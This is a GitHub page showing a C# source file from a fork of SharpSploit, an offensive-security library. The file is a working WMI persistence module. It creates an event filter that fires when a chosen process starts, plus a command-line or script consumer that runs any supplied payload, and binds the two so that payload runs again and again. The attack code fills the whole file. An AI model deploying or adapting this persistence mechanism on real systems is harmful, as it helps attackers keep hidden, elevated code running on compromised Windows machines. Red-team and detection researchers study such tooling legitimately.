forked from cobbr/SharpSploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathWMI.cs
More file actions
137 lines (123 loc) · 5.91 KB
/
WMI.cs
File metadata and controls
137 lines (123 loc) · 5.91 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
// Author: Ryan Cobb (@cobbr_io)
// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
// License: BSD 3-Clause
using System;
using System.Management;
namespace SharpSploit.Persistence
{
/// <summary>
/// WMI is a class for abusing WMI Event Subscriptions to establish peristence. Requires elevation.
/// </summary>
public class WMI
{
/// <summary>
/// Creates a WMI Event, Consumer and Binding to execuate a payload.
/// </summary>
/// <author>Daniel Duggan (@_RastaMouse)</author>
/// <returns>Bool. True if execution succeeds, false otherwise.</returns>
/// <remarks>
/// Credit to Andrew Luke (@sw4mp_f0x) for PowerLurk and
/// Dominic Chell (@domchell) for Persistence Part 3 – WMI Event Subscription.
/// </remarks>
/// <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
/// <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
/// <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
/// <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
/// <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
/// <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
public static bool InstallWMIPersistence(string EventName, EventFilter EventFilter, EventConsumer EventConsumer, string Payload, string ProcessName = "notepad.exe", ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
{
try
{
ManagementObject eventFilter = CreateEventFilter(EventName, EventFilter, ProcessName);
ManagementObject eventConsumer = CreateEventConsumer(EventName, EventConsumer, Payload, ScriptingEngine);
CreateBinding(eventFilter, eventConsumer);
return true;
}
catch (Exception e)
{
Console.Error.WriteLine("WMI Exception: " + e.Message);
}
return false;
}
private static ManagementObject CreateEventFilter(string EventName, EventFilter EventFilter, string ProcessName)
{
ManagementObject _EventFilter = null;
try
{
ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
string query = string.Empty;
if (EventFilter == EventFilter.ProcessStart)
{
query = $@"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='{ProcessName}'";
}
WqlEventQuery wql = new WqlEventQuery(query);
_EventFilter = wmiEventFilter.CreateInstance();
_EventFilter["Name"] = EventName;
_EventFilter["Query"] = wql.QueryString;
_EventFilter["QueryLanguage"] = wql.QueryLanguage;
_EventFilter["EventNameSpace"] = @"root/cimv2";
_EventFilter.Put();
}
catch (Exception e)
{
Console.Error.WriteLine(e.Message);
}
return _EventFilter;
}
private static ManagementObject CreateEventConsumer(string ConsumerName, EventConsumer EventConsumer, string Payload, ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
{
ManagementObject _EventConsumer = null;
try
{
ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
if (EventConsumer == EventConsumer.CommandLine)
{
_EventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
_EventConsumer["Name"] = ConsumerName;
_EventConsumer["RunInteractively"] = false;
_EventConsumer["CommandLineTemplate"] = Payload;
}
else if (EventConsumer == EventConsumer.ActiveScript)
{
_EventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
_EventConsumer["Name"] = ConsumerName;
if (ScriptingEngine == ScriptingEngine.JScript)
_EventConsumer["ScriptingEngine"] = "JScript";
else if (ScriptingEngine == ScriptingEngine.VBScript)
_EventConsumer["ScriptingEngine"] = "VBScript";
_EventConsumer["ScriptText"] = Payload;
}
_EventConsumer.Put();
}
catch (Exception e)
{
Console.Error.WriteLine(e.Message);
}
return _EventConsumer;
}
private static void CreateBinding(ManagementObject EventFilter, ManagementObject EventConsumer)
{
ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
ManagementObject _Binding = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
_Binding["Filter"] = EventFilter.Path.RelativePath;
_Binding["Consumer"] = EventConsumer.Path.RelativePath;
_Binding.Put();
}
public enum EventFilter
{
ProcessStart
}
public enum EventConsumer
{
CommandLine,
ActiveScript
}
public enum ScriptingEngine
{
JScript,
VBScript
}
}
}